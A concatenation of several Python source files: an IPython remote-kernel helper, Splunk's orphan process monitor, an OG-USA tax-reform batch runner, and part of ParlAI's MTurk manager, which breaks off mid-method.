in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
kc = BlockingKernelClient(**connection_info)
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip : str
The IP address to listen on (likely the parent object's ip).
ns : dict
Any names that should be injected into the IPython namespace.
log : logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from ipykernel.kernelapp import IPKernelApp
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
# start the app's IOLoop in its thread
IOLoop.current().start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
return app
|
orphan_process_monitor.py
|
# SPDX-FileCopyrightText: 2020 Splunk Inc.
#
# SPDX-License-Identifier: Apache-2.0
from builtins import object
import os
import threading
import time
import traceback
from splunktalib.common import log
class OrphanProcessChecker(object):
def __init__(self, callback=None):
"""
Only work for Linux platform. On Windows platform, is_orphan is always
False
"""
if os.name == "nt":
self._ppid = 0
else:
self._ppid = os.getppid()
self._callback = callback
def is_orphan(self):
if os.name == "nt":
return False
res = self._ppid != os.getppid()
if res:
log.logger.warn("Process=%s has become orphan", os.getpid())
return res
def check_orphan(self):
res = self.is_orphan()
if res and self._callback:
self._callback()
return res
class OrphanProcessMonitor(object):
def __init__(self, callback):
self._checker = OrphanProcessChecker(callback)
self._thr = threading.Thread(target=self._do_monitor)
self._thr.daemon = True
self._started = False
def start(self):
if self._started:
return
self._started = True
self._thr.start()
def stop(self):
self._started = False
def _do_monitor(self):
while self._started:
try:
res = self._checker.check_orphan()
if res:
break
time.sleep(1)
except Exception:
log.logger.error(
"Failed to monitor orphan process, reason=%s",
traceback.format_exc(),
)
|
run_many_ogusa_parallel.py
|
import ogusa
import os
import sys
from multiprocessing import Process, Pool
import time
import numpy as np
import pandas as pd
from ogusa.scripts import postprocess
from ogusa.scripts.execute import runner
from ogusa.utils import REFORM_DIR, BASELINE_DIR
CUR_PATH = os.path.abspath(os.path.dirname(__file__))
PUF_PATH = os.path.join(CUR_PATH, '../ogusa/puf.csv')
CPU_COUNT = 4
def run_micro_macro(user_params, reform=None, baseline_dir=BASELINE_DIR,
reform_dir=REFORM_DIR, guid='', data=PUF_PATH,
ok_to_run_baseline=True):
start_time = time.time()
T_shifts = np.zeros(50)
T_shifts[2:10] = 0.01
T_shifts[10:40]= -0.01
G_shifts = np.zeros(6)
G_shifts[0:3] = -0.01
G_shifts[3:6] = -0.005
user_params = {'frisch':0.41, 'start_year':2017, 'debt_ratio_ss':1.0, 'T_shifts':T_shifts, 'G_shifts':G_shifts}
'''
------------------------------------------------------------------------
Run baseline
------------------------------------------------------------------------
'''
print('path exists', not os.path.exists(baseline_dir), ok_to_run_baseline)
if not os.path.exists(baseline_dir) and ok_to_run_baseline:
output_base = baseline_dir
input_dir = baseline_dir
kwargs={'output_base':baseline_dir, 'baseline_dir':baseline_dir,
'test':False, 'time_path':True, 'baseline':True,
'analytical_mtrs':False, 'age_specific':True,
'user_params':user_params,'guid':'baseline',
'run_micro':True, 'small_open': False, 'budget_balance':False,
'baseline_spending':False, 'data': data}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
'''
------------------------------------------------------------------------
Run reform
------------------------------------------------------------------------
'''
output_base = reform_dir
input_dir = reform_dir
kwargs={'output_base':output_base, 'baseline_dir':baseline_dir,
'test':False, 'time_path':True, 'baseline':False,
'analytical_mtrs':False, 'age_specific':True,
'user_params':user_params,'guid':guid, 'reform':reform ,
'run_micro':True, 'small_open': False, 'budget_balance':False,
'baseline_spending':False, 'data': data}
runner(**kwargs)
ans = postprocess.create_diff(baseline_dir=baseline_dir, policy_dir=reform_dir)
print "total time was ", (time.time() - start_time)
print 'Percentage changes in aggregates:', ans
# return ans
if __name__ == "__main__":
data = pd.read_csv(PUF_PATH)
reform0 = {
2016: {
'_II_rt1': [.09],
'_II_rt2': [.135],
'_II_rt3': [.225],
'_II_rt4': [.252],
'_II_rt5': [.297],
'_II_rt6': [.315],
'_II_rt7': [0.3564],
},
}
reform1 = {
2016: {
'_II_rt7': [0.35],
},
}
reform2 = {
2016: {
'_II_rt7': [0.34],
}, }
reform3 = {
2016: {
'_CG_rt3': [0.25],
}, }
reform4 = {
2016: {
'_CG_rt3': [0.24],
}, }
reform5 = {
2016: {
'_CG_rt3': [0.16],
}, }
reform6 = {
2016: {
'_STD': [ [6100*2, 12200*2, 6100*2, 8950*2, 12200*2],
[6200*2, 12400*2, 6200*2, 9100*2, 12400*2],
[6300*2, 12600*2, 6300*2, 9250*2, 12600*2]]
}, }
reform7 = {
2016: {
'_STD': [ [6100*2.1, 12200*2.1, 6100*2.1, 8950*2.1, 12200*2.1],
[6200*2.1, 12400*2.1, 6200*2.1, 9100*2.1, 12400*2.1],
[6300*2.1, 12600*2.1, 6300*2.1, 9250*2.1, 12600*2.1]]
}, }
reform8 = {
2016: {
'_II_rt3': [.15],
'_II_rt4': [.15],
'_II_rt5': [.15],
'_II_brk5':[[250000, 250000, 125000, 250000, 250000]]
}, }
reform9 = {
2016: {
'_STD': [[12600, 25200, 12600, 18600, 25300]],
'_II_brk1': [[27825, 55650, 27825, 39750, 55650]],
'_II_brk2': [[65005, 130010, 65005, 88180, 130010]],
'_AMT_rt1': [.0],
'_AMT_rt2': [.0]
},}
reforms = [reform0, reform1, reform2, reform3, reform4, reform5, reform6,
reform7, reform8, reform9]
# make sure we have a baseline result before other reforms are run
ok_to_run_baseline = True
run_micro_macro({},
reforms[0],
"./OUTPUT_BASELINE",
"./OUTPUT_REFORM_" + str(0),
str(0),
data,
ok_to_run_baseline,)
# run reforms in parallel
pool = Pool(processes=CPU_COUNT)
results = []
ok_to_run_baseline = False
for i in range(1, len(reforms)):
args = ({},
reforms[i],
"./OUTPUT_BASELINE",
"./OUTPUT_REFORM_" + str(i),
str(i),
data,
ok_to_run_baseline,)
async_result = pool.apply_async(run_micro_macro, args)
results.append(async_result)
for result in results:
result.get()
pool.close()
pool.join()
|
mturk_manager.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
import logging
import math
import os
import pickle
import threading
import time
import uuid
import errno
import requests
from parlai.mturk.core.agents import AssignState
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_manager import WorkerManager
from parlai.mturk.core.mturk_data_handler import MTurkDataHandler
import parlai.mturk.core.data_model as data_model
import parlai.mturk.core.mturk_utils as mturk_utils
import parlai.mturk.core.server_utils as server_utils
import parlai.mturk.core.shared_utils as shared_utils
# Timeout before cancelling a world start
WORLD_START_TIMEOUT = 11
# Multiplier to apply when creating hits to ensure worker availibility
HIT_MULT = 1.5
# 6 minute timeout to ensure only one thread updates the time logs.
# Those update once daily in a 3 minute window
RESET_TIME_LOG_TIMEOUT = 360
TIME_LOGS_FILE_NAME = 'working_time.pickle'
TIME_LOGS_FILE_LOCK = 'working_time.lock'
AMAZON_SNS_NAME = 'AmazonMTurk'
SNS_ASSIGN_ABANDONDED = 'AssignmentAbandoned'
SNS_ASSIGN_SUBMITTED = 'AssignmentSubmitted'
SNS_ASSIGN_RETURNED = 'AssignmentReturned'
PARLAI_MTURK_NOTICE_URL = 'http://www.parl.ai/mturk/mturk_notice/'
PARLAI_MTURK_UPLOAD_URL = 'http://www.parl.ai/mturk/mturk_stats/'
PARLAI_CRED_DIR = os.path.expanduser('~/.parlai')
PARLAI_MTURK_LOG_PERMISSION_FILE = \
os.path.join(PARLAI_CRED_DIR, 'mturk_log_permission.pickle')
TWO_WEEKS = 60 * 60 * 24 * 7 * 2
parent_dir = os.path.dirname(os.path.abspath(__file__))
class LockFile():
flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY
def __init__(self, filename):
self.filename = filename
self.fd = None
def __enter__(self):
while self.fd is None:
try:
self.fd = os.open(self.filename, self.flags)
except OSError as e:
if e.errno == errno.EEXIST: # Failed as the file exists.
pass
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
return self
def __exit__(self, *args):
os.close(self.fd)
os.remove(self.filename)
class MTurkManager():
"""Manages interactions between MTurk agents as well as direct interactions
between a world and the MTurk server.
"""
STATE_CREATED = 0 # object created
STATE_SERVER_ALIVE = 1 # heroku server running
STATE_INIT_RUN = 2 # run initialized
STATE_ACCEPTING_WORKERS = 3 # Socket ready to recieve workers
STATE_HITS_MADE = 4 # hits created
def __init__(self, opt, mturk_agent_ids, is_test=False, use_db=False):
"""Create an MTurkManager using the given setup opts and a list of
agent_ids that will participate in each conversation
"""
if not is_test:
try:
import parlai_internal.mturk.configs as local_configs
opt = local_configs.apply_default_opts(opt)
except Exception:
# not all users will be drawing configs from internal settings
pass
self.opt = opt
if self.opt['unique_worker'] or \
self.opt['unique_qual_name'] is not None:
self.opt['allowed_conversations'] = 1
self.server_url = None
self.topic_arn = None
self.server_task_name = None
self.port = 443
self.task_group_id = None
self.run_id = None
self.mturk_agent_ids = mturk_agent_ids
self.task_files_to_copy = None
self.is_sandbox = opt['is_sandbox']
self.agent_pool_change_condition = threading.Condition()
self.onboard_function = None
self.num_conversations = opt['num_conversations']
self.required_hits = math.ceil(
self.num_conversations * len(self.mturk_agent_ids) * HIT_MULT
)
self.minimum_messages = opt.get('min_messages', 0)
self.auto_approve_delay = \
opt.get('auto_approve_delay', 4 * 7 * 24 * 3600)
self.has_time_limit = opt.get('max_time', 0) > 0
self.socket_manager = None
self.worker_manager = WorkerManager(self, opt)
self.is_test = is_test
self.is_unique = False
self.max_hits_per_worker = opt.get('max_hits_per_worker', 0)
self._init_logging_config()
self.is_shutdown = False
self.use_db = use_db # TODO enable always DB integration is complete
self.db_logger = None
self.logging_permitted = False
self.task_state = self.STATE_CREATED
# Helpers and internal manager methods #
def _init_state(self):
"""Initialize everything in the worker, task, and thread states"""
# TODO handle pooling in own class, note this is an agent_pool
self.agent_pool = []
# TODO move some state to DB
self.hit_id_list = [] # list of outstanding incomplete hits
self.assignment_to_onboard_thread = {}
self.conversation_index = 0
self.started_conversations = 0
self.completed_conversations = 0
self.task_threads = []
self.accepting_workers = True
self._reset_time_logs(init_load=True)
self.qualifications = None
self.unique_qual_name = None
self.time_limit_checked = time.time()
self.task_state = self.STATE_INIT_RUN
self.last_hit_check = time.time()
if self.use_db:
db_filename = 'pmt_sbdata.db' if self.is_sandbox else 'pmt_data.db'
self.db_logger = MTurkDataHandler(self.task_group_id, db_filename)
def _init_logging_config(self):
"""Initialize logging settings from the opt"""
shared_utils.set_is_debug(self.opt['is_debug'])
shared_utils.set_log_level(self.opt['log_level'])
def _logging_permission_check(self):
if self.is_test:
return False
if not os.path.exists(PARLAI_CRED_DIR):
os.makedirs(PARLAI_CRED_DIR)
if os.path.exists(PARLAI_MTURK_LOG_PERMISSION_FILE):
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'rb') as perm_file:
permissions = pickle.load(perm_file)
if permissions['allowed'] is True:
return True
elif time.time() - permissions['asked_time'] < TWO_WEEKS:
return False
# Snooze expired
os.remove(PARLAI_MTURK_LOG_PERMISSION_FILE)
print(
'Would you like to help improve ParlAI-MTurk by providing some '
'metrics? We would like to record acceptance, completion, and '
'disconnect rates by worker. These metrics let us track the '
'health of the platform. If you accept we\'ll collect this data '
'on all of your future runs. We\'d ask before collecting anything '
'else, but currently we have no plans to. You can decline to '
'snooze this request for 2 weeks.')
selected = ''
while selected not in ['y', 'Y', 'n', 'N']:
selected = input('Share worker rates? (y/n): ')
if selected not in ['y', 'Y', 'n', 'N']:
print('Must type one of (Y/y/N/n)')
if selected in ['y', 'Y']:
print('Thanks for helping us make the platform better!')
permissions = {
'allowed': selected in ['y', 'Y'],
'asked_time': time.time()
}
with open(PARLAI_MTURK_LOG_PERMISSION_FILE, 'wb+') as perm_file:
pickle.dump(permissions, perm_file)
return permissions['allowed']
def _upload_worker_data(self):
"""Uploads worker data acceptance and completion rates to the parlai
server
"""
worker_data = self.worker_manager.get_worker_data_package()
data = {'worker_data': worker_data}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.post(PARLAI_MTURK_UPLOAD_URL, json=data, headers=headers)
def _maintain_hit_status(self):
def update_status():
while len(self.hit_id_list) > 0:
cur_time = time.time()
if cur_time - self.last_hit_check > 10:
self.last_hit_check = cur_time
for hit_id in self.hit_id_list.copy():
hit = self.get_hit(hit_id)
hit_data = hit['HIT']
if hit_data['HITStatus'] in \
['Reviewable', 'Reviewing', 'Disposed']:
self.hit_id_list.remove(hit_id)
time.sleep(10)
hit_status_thread = threading.Thread(target=update_status, daemon=True)
hit_status_thread.start()
def _reset_time_logs(self, init_load=False, force=False):
# Uses a weak lock file to try to prevent clobbering between threads
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if os.path.exists(file_path):
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
# Initial loads should only reset if it's been a day,
# otherwise only need to check an hour for safety
compare_time = 24 * 60 * 60 if init_load else 60 * 60
if time.time() - existing_times['last_reset'] < \
compare_time and not force:
return # do nothing if it's been less than a day
reset_workers = list(existing_times.keys())
reset_workers.remove('last_reset')
if len(reset_workers) != 0:
self.worker_manager.un_time_block_workers(
reset_workers)
# Reset the time logs
os.remove(file_path)
# new time logs
with open(file_path, 'wb+') as time_log_file:
time_logs = {'last_reset': time.time()}
pickle.dump(time_logs, time_log_file,
pickle.HIGHEST_PROTOCOL)
def _log_working_time(self, mturk_agent):
additional_time = time.time() - mturk_agent.creation_time
worker_id = mturk_agent.worker_id
file_path = os.path.join(parent_dir, TIME_LOGS_FILE_NAME)
file_lock = os.path.join(parent_dir, TIME_LOGS_FILE_LOCK)
with LockFile(file_lock) as _lock_file:
assert _lock_file is not None
if not os.path.exists(file_path):
self._reset_time_logs()
with open(file_path, 'rb+') as time_log_file:
existing_times = pickle.load(time_log_file)
total_work_time = existing_times.get(worker_id, 0)
total_work_time += additional_time
existing_times[worker_id] = total_work_time
os.remove(file_path)
with open(file_path, 'wb+') as time_log_file:
pickle.dump(existing_times, time_log_file,
pickle.HIGHEST_PROTOCOL)
if total_work_time > int(self.opt.get('max_time')):
self.worker_manager.time_block_worker(worker_id)
def _move_agents_to_waiting(self, agents):
"""Put all agents into waiting worlds, expire them if no longer
accepting agents. If the agent is already final, clean it
"""
for agent in agents:
worker_id = agent.worker_id
assignment_id = agent.assignment_id
if agent.is_final():
agent.reduce_state()
self.socket_manager.close_channel(agent.get_connection_id())
continue
conversation_id = 'w_{}'.format(uuid.uuid4())
if self.accepting_workers:
# Move the worker into a waiting world
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=conversation_id,
new_agent_id='waiting',
)
else:
self.force_expire_hit(worker_id, assignment_id)
def _expire_onboarding_pool(self):
"""Expire any agent that is in an onboarding thread"""
def expire_func(agent):
self.force_expire_hit(agent.worker_id, agent.assignment_id)
def is_onboard(agent):
return agent.get_status() == AssignState.STATUS_ONBOARDING
self.worker_manager.map_over_agents(expire_func, is_onboard)
def _expire_agent_pool(self):
"""Expire all workers in the worker pool"""
for agent in self.agent_pool.copy():
self.force_expire_hit(agent.worker_id, agent.assignment_id)
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
def _get_unique_pool(self, eligibility_function):
"""Return a filtered version of the worker pool where each worker is
only listed a maximum of one time. In sandbox this is overridden for
testing purposes, and the same worker can be returned more than once
"""
pool = [a for a in self.agent_pool if not a.hit_is_returned]
if eligibility_function['multiple'] is True:
agents = eligibility_function['func'](pool)
else:
agents = [a for a in pool if eligibility_function['func'](a)]
unique_agents = []
unique_worker_ids = []
for agent in agents:
if (self.is_sandbox) or (agent.worker_id not in unique_worker_ids):
unique_agents.append(agent)
unique_worker_ids.append(agent.worker_id)
return unique_agents
def _add_agent_to_pool(self, agent):
"""Add a single agent to the pool"""
if agent not in self.agent_pool:
# Add the agent to pool
with self.agent_pool_change_condition:
if agent not in self.agent_pool:
shared_utils.print_and_log(
logging.DEBUG,
"Adding worker {} to pool.".format(agent.worker_id)
)
self.agent_pool.append(agent)
def _remove_from_agent_pool(self, agent):
"""Remove an agent from the pool. should be called under the
agent_pool_change_condition being set.
"""
assert agent in self.agent_pool, 'agent not in pool'
self.agent_pool.remove(agent)
def _handle_agent_disconnect(self, worker_id, assignment_id):
"""Mark a worker as disconnected and send a message to all agents in
his conversation that a partner has disconnected.
"""
self.worker_manager.handle_agent_disconnect(
worker_id, assignment_id, self._handle_partner_disconnect)
def _handle_partner_disconnect(self, agent):
"""Send a message to an agent notifying them that a partner has
disconnected and we marked the HIT as complete for them
"""
if agent is not None and not agent.is_final():
# Update the assignment state
agent.some_agent_disconnected = True
agent_messages = [m for m in agent.get_messages()
if 'id' in m and m['id'] == agent.id]
if len(agent_messages) < self.minimum_messages:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT_EARLY)
else:
agent.set_status(AssignState.STATUS_PARTNER_DISCONNECT)
# Create and send the command
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(agent.worker_id, agent.assignment_id, data,
ack_func=disconnect_agent)
def _restore_agent_state(self, worker_id, assignment_id):
"""Send a command to restore the state of an agent who reconnected"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is not None:
agent.alived = False
def send_state_data():
while not agent.alived and not agent.hit_is_expired:
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
data = {
'text': data_model.COMMAND_RESTORE_STATE,
'messages': agent.get_messages(),
'last_command': agent.get_last_command(),
}
self.send_command(worker_id, assignment_id, data)
if agent.message_request_time is not None:
agent.request_message()
state_thread = threading.Thread(target=send_state_data)
state_thread.daemon = True
state_thread.start()
# Return an agent to their conversation, then restore the state
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=agent.conversation_id,
new_agent_id=agent.id,
)
def _setup_socket(self, timeout_seconds=None):
"""Set up a socket_manager with defined callbacks"""
assert self.task_state >= self.STATE_INIT_RUN, \
'socket cannot be set up until run is started'
socket_server_url = self.server_url
if (self.opt['local']): # skip some hops for local stuff
socket_server_url = "https://localhost"
self.socket_manager = SocketManager(
socket_server_url,
self.port,
self._on_alive,
self._on_new_message,
self._on_socket_dead,
self.task_group_id,
socket_dead_timeout=timeout_seconds,
server_death_callback=self.shutdown,
)
def _on_alive(self, pkt):
"""Update MTurkManager's state when a worker sends an
alive packet. This asks the socket manager to open a new channel and
then handles ensuring the worker state is consistent
"""
shared_utils.print_and_log(
logging.DEBUG,
'on_agent_alive: {}'.format(pkt)
)
worker_id = pkt.data['worker_id']
hit_id = pkt.data['hit_id']
assign_id = pkt.data['assignment_id']
conversation_id = pkt.data['conversation_id']
if not assign_id:
# invalid assignment_id is an auto-fail
shared_utils.print_and_log(
logging.WARN,
'Agent ({}) with no assign_id called alive'.format(worker_id)
)
return
# Open a channel if it doesn't already exist
self.socket_manager.open_channel(worker_id, assign_id)
# Get a state for this worker, create if non existing
worker_state = self.worker_manager.worker_alive(worker_id)
if self.db_logger is not None:
self.db_logger.log_worker_note(
worker_id, assign_id,
'Reconnected with conversation_id {} at {}'.format(
conversation_id, time.time()))
if not worker_state.has_assignment(assign_id):
# New connection for the worker. First ensure that this connection
# isn't violating our uniqueness constraints
completed_assignments = worker_state.completed_assignments()
max_hits = self.max_hits_per_worker
if ((self.is_unique and completed_assignments > 0) or
(max_hits != 0 and completed_assignments > max_hits)):
text = (
'You have already participated in this HIT the maximum '
'number of times. This HIT is now expired. '
'Please return the HIT.'
)
self.force_expire_hit(worker_id, assign_id, text)
return
# Ensure we are still accepting workers
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
return
# Ensure worker has not exceeded concurrent convo cap
convs = worker_state.active_conversation_count()
allowed_convs = self.opt['allowed_conversations']
if allowed_convs > 0 and convs >= allowed_convs:
text = ('You can participate in only {} of these HITs at '
'once. Please return this HIT and finish your '
'existing HITs before accepting more.'.format(
allowed_convs
))
self.force_expire_hit(worker_id, assign_id, text)
return
# Initialize a new agent for this worker
self.worker_manager.assign_task_to_worker(
hit_id, assign_id, worker_id
)
if self.db_logger is not None:
self.db_logger.log_worker_accept_assignment(
worker_id, assign_id, hit_id)
agent = self.worker_manager._get_agent(worker_id, assign_id)
self._onboard_new_agent(agent)
else:
# Reconnecting worker
agent = self.worker_manager._get_agent(worker_id, assign_id)
agent.log_reconnect()
agent.alived = True
if agent.get_status() == AssignState.STATUS_NONE:
# See if assigned an onboarding world, update state if so
if self.is_onboarding_world(conversation_id):
agent.set_status(AssignState.STATUS_ONBOARDING)
return
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting before even being given a world. Kill the hit
# so that on a reconnect they can get a new one assigned and
# the resources of the first one are cleaned.
self.force_expire_hit(worker_id, assign_id)
return
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# See if moved to a waiting world, update state if so
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world should either restore
# state or expire (if workers are no longer being accepted
# for this task)
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
elif not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif agent.get_status() == AssignState.STATUS_WAITING:
if self.is_task_world(conversation_id):
agent.set_status(AssignState.STATUS_IN_TASK)
agent.clear_messages()
return
# Reconnecting in waiting is either the first reconnect after
# being told to wait or a waiting reconnect. Restore state if
# no information is held, and add to the pool if not already in
# the pool
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
self._add_agent_to_pool(agent)
elif agent.get_status() == AssignState.STATUS_IN_TASK:
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world or to a task world
# should resend the messages already in the conversation
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif (agent.get_status() == AssignState.STATUS_DISCONNECT or
agent.get_status() == AssignState.STATUS_DONE or
agent.get_status() == AssignState.STATUS_EXPIRED or
agent.get_status() == AssignState.STATUS_RETURNED or
agent.get_status() == AssignState.STATUS_PARTNER_DISCONNECT):
# inform the connecting user in all of these cases that the
# task is no longer workable, use appropriate message
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(worker_id, assign_id, data,
ack_func=disconnect_agent)
def _handle_mturk_message(self, pkt):
assignment_id = pkt.assignment_id
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
if agent is None:
return
mturk_event_type = pkt.data['text']
if mturk_event_type == SNS_ASSIGN_RETURNED:
agent.hit_is_returned = True
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_ABANDONDED:
agent.set_hit_is_abandoned()
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_SUBMITTED:
# Socket dead already called, just mark as complete
agent.hit_is_complete = True
def _on_new_message(self, pkt):
"""Handle incoming messages from Amazon's SNS queue. All other packets
should be handled by the worker_manager
"""
if pkt.sender_id == AMAZON_SNS_NAME:
self._handle_mturk_message(pkt)
return
self.worker_manager.route_packet(pkt)
def _on_socket_dead(self, worker_id, assignment_id):
"""Handle a disconnect event, update state as required and notifying
other agents if the disconnected agent was in conversation with them
returns False if the socket death should be ignored and the socket
should stay open and not be considered disconnected
"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is None:
# This worker never registered, so we don't do anything
return
shared_utils.print_and_log(
logging.DEBUG,
'Worker {} disconnected from {} in status {}'.format(
worker_id,
agent.conversation_id,
agent.get_status()
)
)
if agent.get_status() == AssignState.STATUS_NONE:
# Agent never made it to onboarding, delete
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# Agent never made it to task pool, the onboarding thread will die
# and delete the agent if we mark it as a disconnect
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_WAITING:
# agent is in pool, remove from pool and delete
if agent in self.agent_pool:
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_IN_TASK:
self._handle_agent_disconnect(worker_id, assignment_id)
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_DONE:
# It's okay if a complete assignment socket dies, but wait for the
# world to clean up the resource
return
self.socket_manager.close_channel(agent.get_connection_id())
def _onboard_new_agent(self, mturk_agent):
"""Handle creating an onboarding thread and moving an agent through
the onboarding process, updating the state properly along the way
Returns True if a thread is launched, False if the call is ignored.
"""
# get state variable in question
worker_id = mturk_agent.worker_id
assignment_id = mturk_agent.assignment_id
def _onboard_function(mturk_agent):
"""Onboarding wrapper to set state to onboarding properly"""
if self.onboard_function:
conversation_id = 'o_' + str(uuid.uuid4())
self.worker_manager.change_agent_conversation(
agent=mturk_agent,
conversation_id=conversation_id,
new_agent_id='onboarding',
)
# Wait for turker to be in onboarding status
did_arrive = \
mturk_agent.wait_for_status(AssignState.STATUS_ONBOARDING)
if not did_arrive:
return
# call onboarding function
self.onboard_function(mturk_agent)
# once onboarding is done, move into a waiting world
self._move_agents_to_waiting([mturk_agent])
if assignment_id in self.assignment_to_onboard_thread:
if self.assignment_to_onboard_thread[assignment_id].isAlive():
return False
